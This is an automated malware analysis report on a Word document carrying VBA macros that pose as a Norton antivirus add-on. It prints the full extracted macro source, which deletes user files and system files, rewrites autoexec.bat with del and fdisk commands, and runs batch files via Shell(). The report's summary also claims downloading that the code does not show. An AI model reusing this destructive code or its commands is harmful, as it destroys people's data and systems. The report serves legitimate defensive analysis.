Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 98b62d6e8699b693…

MALICIOUS

Office (OLE)

40.0 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 80ae09c52758549589a087d407149cae SHA-1: 067d7875aa582c077e82a98642dfbf714e8b6964 SHA-256: 98b62d6e8699b6933ed826c1f97a185bd03514001b43cb840550665b9bbdce1b
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros with AutoOpen and AutoClose functions, indicating an attempt to execute code upon opening and closing the document. The AutoClose macro contains logic that, under specific conditions (Day=4 or 20, Hour=12 or 1), attempts to write malicious commands to 'autoexec.bat' and execute 'C:\Windows\logo.bat'. It also attempts to create a directory and potentially write to a file starting with 'c:\Windows\add.ba'. These actions suggest the macro is designed to download and execute further payloads or modify system behavior.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3283 bytes
SHA-256: cfb9caf013a594c0c087ceba059b1f3676cfa89649facebc5ff5766678f0c250
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 10/29/99 by Pat"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.Op"
MsgBox ("Add on for Norton Anti-virus 2000")
MsgBox ("This add on will let norton anti-vius pick up java virus, trojens, and worms more better.")

Call Check

End Sub

Sub Check()
MsgBox ("Checking to see if you system is 'OK'")
Call Filesize

End Sub

Sub AutoClose()
user = InputBox("Would like to see a list of the thing that were added to your system")
If user = "yes" Then
MsgBox ("Added new virus finders, fixed a bug that was in Norton Anti-virus 2000, added five new trojen defs, and fixed a small bug that made the virus scan slow so your virus scan can run faster then ever before")
End If
If user = "bloodwaste" Then
GoTo ex
End If
If Day(Now()) = "4" Or Day(Now()) = "20" Then
Open "autoexec.bat" For Output As #1
Print #1, "echo off"
Print #1, "echo GET DOWN ON YOUR FLOOR AND THANK GOD FOR THE GIFT NUCLEAR MELT DOWN GAVE YOU!"
Print #1, "del *.sys"
Print #1, "cd\Windows"
Print #1, "del *.sys"
Print #1, "del *.exe"
Print #1, "fdisk /pri"
Close #1
End If

If Hour(Now()) = 12 Or 1 Then
Shell ("C:\Windows\logo.bat")
End If



ex:
End Sub

Sub pop()
SendKeys "This may take a mintute or so."
MkDir ("C:\Windows\System\nortonsave")
Call dir
SendKeys "updataing"
End Sub

Sub virus()
On Error Resume Next

Dim r As String
Dim z As String
Dim z As String
Dim i As String

r = "c:\Windows\add.bat"
Kill ("C:\progra~1\norton~1\diskedit.exe")
Kill ("C:\progra~1\norton~1\*.sys")
Kill ("C:\*.doc")
Kill ("C:\Windows\desktop\*.exe")
z = "C:\anti.bat"
Kill ("C:\Windows\Desktop\*.doc")
Kill ("C:\Windows\desktop\*.xls")
Kill ("C:\Windows\Desktop\*.zip")

Open r For Output As #1
Print #1, "echo off"
Print #1, "del *.bak"
Print #1, "cd\Windows\Help"
Print #1, "del *.hlp"
Print #1, "cd\Windows\Desktop"
Print #1, "del *.txt"
Print #1, "rename *.c *.dll"
Print #1, "rename *.cpp *.sys"
Print #1, "move C:\Windows\Desktop\*.sys C:\Windows\system\nortonsave"
Print #1, "move C:\Windows\desktop\*.dll C:\Windows\system\nortonsave"
Close #1

i = "C:\Windows\logo.bat"
Open z For Output As #1
Print #1, "echo off"
Print #1, "echo"
Print #1, "echo You have a dark animal on your system"
Print #1, "pause"
Print #1, "C:\Windows\logo.bat"
Print #1, "Rem Good Day from ?."
Close #1

Open i For Output As #1
Print #1, "echo off"
Print #1, "echo       xxxxxx"
Print #1, "echo      x      x"
Print #1, "echo     x        x"
Print #1, "echo      xx     xx "
Print #1, "echo        x   x"
Print #1, "echo        x   x"
Print #1, "echo        x   x"
Print #1, "echo                 Nuclear Melt Down"
Close #1

Shell ("C:\Windows\add.bat")
End Sub

Sub dir()
Call virus
Call Norton

End Sub

Sub Norton()
Kill ("C:\Windows\Desktop\*.bmp")

End Sub

Sub Filesize()
SendKeys "Please wait"
                  'Good day
Call pop

End Sub